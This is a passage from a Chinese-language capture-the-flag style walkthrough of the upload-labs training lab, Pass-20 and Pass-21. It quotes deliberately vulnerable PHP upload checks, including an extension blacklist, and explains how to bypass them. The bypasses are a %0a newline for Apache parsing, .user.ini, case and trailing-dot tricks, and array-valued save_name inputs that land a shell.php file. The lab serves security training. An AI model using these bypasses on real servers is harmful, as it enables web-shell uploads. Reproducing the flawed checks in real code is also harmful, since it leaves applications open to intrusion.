- 之后使用 BurpSuite 构造一个爆破该 PHP 的文件的功能即可。

注：这关上传路径有点问题，需要修改一下。

function setDir( $dir ){
    if( !is_writable( $dir ) ){
      return "DIRECTORY_FAILURE";
    } else { 
      $this->cls_upload_dir = $dir."/";
      return 1;
    }
}

Pass-20（黑名单 | Apache 换行解析漏洞绕过）

漏洞源码分析：

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php", "php5", "php4", "php3", "php2", "html", "htm", "phtml", "pht", "jsp", "jspa", "jspx", "jsw", "jsv", "jspf", "jtml", "asp", "aspx", "asa", "asax", "ascx", "ashx", "asmx", "cer", "swf", "htaccess");
        
        $file_name = $_POST['save_name'];
        $file_ext = pathinfo($file_name, PATHINFO_EXTENSION);

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '禁止保存为该类型文件！';
        }

    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

这关采用黑名单过滤，但总体是过滤不完全，所以绕过方式很多：
- .user.ini
- 大小写
- 末尾空格、点
- 位置后缀解析
但是作者在 README.md 中写了这么一段话：

说明本关是要在 Linux 下进行绕过的，在 Releases 里面也有提及：

这里直接用 Docker 启动作者的镜像：

1 2	root at kali in ~/Desktop $ docker run -d -p 80:80 --name upload-labs c0ny1/upload-labs:latest

但是作者在制作镜像的时候，没有创建 upload 目录，所以需要进入容器内容创建一个：

root at kali in ~/Desktop 
$ docker exec -it upload-labs/bin/bash

root@7f519206f66a:/var/www/html# mkdir upload
root@7f519206f66a:/var/www/html# chown www-data:www-data upload

上传文件，在如下位置添加 %0a 并进行 URL 解码即可成功上传：

访问一下：

Pass-21（白名单 | 数组绕过）

漏洞源码分析：

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {

        $is_upload = false;
        $msg = null;
        if(!empty($_FILES['upload_file'])){
            //mime check
            $allow_type = array('image/jpeg','image/png','image/gif');
            if(!in_array($_FILES['upload_file']['type'],$allow_type)){
                $msg = "禁止上传该类型文件!";
            }else{
                //check filename
                $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
                if (!is_array($file)) {
                    $file = explode('.', strtolower($file));
                }

                $ext = end($file);
                $allow_suffix = array('jpg','png','gif');
                if (!in_array($ext, $allow_suffix)) {
                    $msg = "禁止上传该后缀文件!";
                }else{
                    $file_name = reset($file) . '.' . $file[count($file) - 1];
                    $temp_file = $_FILES['upload_file']['tmp_name'];
                    $img_path = UPLOAD_PATH . '/' .$file_name;
                    if (move_uploaded_file($temp_file, $img_path)) {
                        $msg = "文件上传成功！";
                        $is_upload = true;
                    } else {
                        $msg = "文件上传失败！";
                    }
                }
            }
        }else{
            $msg = "请选择要上传的文件！";
        }
        
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

这关是白名单校验，那肯定要对后缀想想办法了。
简单分析一下代码执行顺序：
- 判断上传文件的 MIME 类型；
- 判断是否存在 save_name，不存在则使用 $_FILE；
- 将文件名进行拆分成数组，获取最后一位数组的值作为扩展名进行白名单校验；
- 校验通过后，获取第一个数组的值与数组下标 - 1 的值进行拼接；
- 然后上传文件。
简单分析完之后，发现了华点，如果我们在 save_name 处上传的是数组的话，会发生什么呢？
假设 save_name 是这样的：

Array(
	[0] => shell.php
    [2] => jpg
)

这时：
- end($file)：jpg
- reset($file)：shell.php
- $file[count($file) - 1]： null
这不就可以绕过了！最终结果如下：

但是这种方式我们可以发现，文件是以 . 号结尾的，在 Windows 下才可以使用。
如果要在 Linux 下使用，需要将 save_name 改成这样：

Array(
	[0] => shell.php/
    [2] => jpg
)

这时：
- end($file)：jpg
- reset($file)：shell.php/
- $file[count($file) - 1]： null
有什么区别呢？这时的文件名变成了 shell.php/.，同时 move_uploaded_file 函数有一个特性，会忽略文件名末尾的/.，估计是函数把/.当作路径来看待了。